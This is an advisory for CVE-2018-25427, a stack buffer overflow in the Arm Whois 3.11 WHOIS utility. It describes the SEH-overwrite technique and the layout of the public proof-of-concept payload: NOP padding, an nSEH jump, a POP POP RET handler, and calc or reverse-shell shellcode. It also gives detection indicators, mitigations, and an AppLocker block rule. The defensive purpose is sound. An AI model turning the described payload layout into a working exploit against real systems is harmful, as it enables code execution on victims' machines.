CVE-2018-25427: Arm Whois Buffer Overflow Vulnerability

CVE-2018-25427 Overview

CVE-2018-25427 is a stack-based buffer overflow [CWE-121] in Arm Whois 3.11, a Windows desktop WHOIS lookup utility published by ArmCode. The application fails to validate the length of user-supplied input passed to the IP address or domain field. Submitting a string longer than 658 bytes corrupts the stack and overwrites the Structured Exception Handler (SEH) record, allowing attackers to redirect execution to attacker-controlled shellcode. The flaw enables arbitrary code execution in the context of the user running the application.

Critical Impact

Attackers can achieve arbitrary code execution on systems running Arm Whois 3.11 by tricking a user into processing a crafted IP address or domain string.

Affected Products

• ArmCode Arm Whois 3.11 (Windows)
• Earlier versions sharing the same input-handling code path
• Distributions of arm-whois.exe hosted on the ArmCode website

Discovery Timeline

• 2018-11-08 - Public proof-of-concept released as Exploit-DB #45796
• 2026-06-01 - CVE CVE-2018-25427 published to NVD
• 2026-06-02 - Last updated in NVD database

Technical Details for CVE-2018-25427

Vulnerability Analysis

Arm Whois 3.11 copies user input from its query text field into a fixed-size stack buffer without bounds checking. When the supplied data exceeds 658 bytes, the copy operation walks past the buffer boundary and overwrites adjacent stack data, including the SEH chain stored on the thread's stack. The overflow lets attackers replace both the next SEH (nSEH) pointer and the SEH handler pointer with attacker-chosen values.

When the corrupted exception record is triggered, Windows dispatches the exception to the overwritten handler address. Attackers typically point the handler at a POP POP RET gadget located in a module without SafeSEH, returning execution into the nSEH field where a short jump leads to shellcode placed earlier in the buffer. The result is arbitrary code execution in the security context of the user who launched Arm Whois.

Root Cause

The root cause is missing input length validation before a stack copy operation. The application trusts the size of the query string and uses an unsafe string routine, classifying the issue under [CWE-121] Stack-based Buffer Overflow. Compilation without /SafeSEH and /GS mitigations allows SEH overwrite techniques to succeed against the unprotected stack frame.

Attack Vector

Exploitation requires the victim to load attacker-supplied data into the IP address or domain input field. Delivery vectors include phishing emails containing crafted text snippets users paste into the tool, malicious files instructing the user to perform a lookup, or wrapper scripts that automate the input. The published proof-of-concept on Exploit-DB constructs a payload of 658 NOPs, a 4-byte nSEH jump, a 4-byte overwritten SEH handler pointing to a POP POP RET gadget, and shellcode that spawns calc.exe or a reverse shell.

See the VulnCheck Advisory for Arm-Whois and Exploit-DB #45796 for technical details.

Detection Methods for CVE-2018-25427

Indicators of Compromise

• Presence of arm-whois.exe version 3.11 on workstations, especially those used by analysts performing domain or IP lookups
• Crash dumps from arm-whois.exe referencing access violations at attacker-controlled addresses or corrupted SEH records
• Child processes spawned by arm-whois.exe such as cmd.exe, powershell.exe, or calc.exe without legitimate operational reason
• Outbound network connections originating from arm-whois.exe to non-WHOIS endpoints (TCP/43 is the legitimate WHOIS port)

Detection Strategies

• Inventory endpoints for installations of arm-whois.exe and flag any matching the vulnerable 3.11 build hash
• Alert on process creation events where arm-whois.exe is the parent of an interactive shell or scripting host
• Monitor for unhandled exceptions and crashes in arm-whois.exe that may indicate exploitation attempts

Monitoring Recommendations

• Forward Windows Error Reporting and Sysmon Event ID 1 and 11 data to a central SIEM for the arm-whois.exe image path
• Track file write events that drop arm-whois.exe to user-writable directories, a common sideloading pattern
• Review egress traffic from hosts running the tool for connections outside TCP/43 WHOIS servers

How to Mitigate CVE-2018-25427

Immediate Actions Required

• Uninstall Arm Whois 3.11 from all endpoints until a fixed build is confirmed available
• Block execution of arm-whois.exe using application control policies such as Windows Defender Application Control or AppLocker
• Restrict outbound TCP/43 traffic to approved WHOIS servers to reduce exposure to malicious response handling

Patch Information

No vendor patch is currently referenced in the NVD entry or the VulnCheck Advisory for Arm-Whois. Users should consult the ArmCode Homepage for any updated release. If no fixed version is published, migrate to an actively maintained WHOIS client or use built-in command-line alternatives such as whois.exe from Sysinternals.

Workarounds

• Replace Arm Whois with a maintained alternative such as Sysinternals whois.exe or a web-based WHOIS service
• Run the tool only inside a non-privileged sandbox or virtual machine isolated from production data
• Disable opening of untrusted text snippets or files in the Arm Whois input field, and train analysts to paste only validated IP and domain strings

# AppLocker rule example to block the vulnerable binary
New-AppLockerPolicy -RuleType Path -User Everyone \
  -Action Deny -Path "%PROGRAMFILES%\ArmCode\arm-whois.exe" \
  -RuleNamePrefix "Block-ArmWhois-CVE-2018-25427"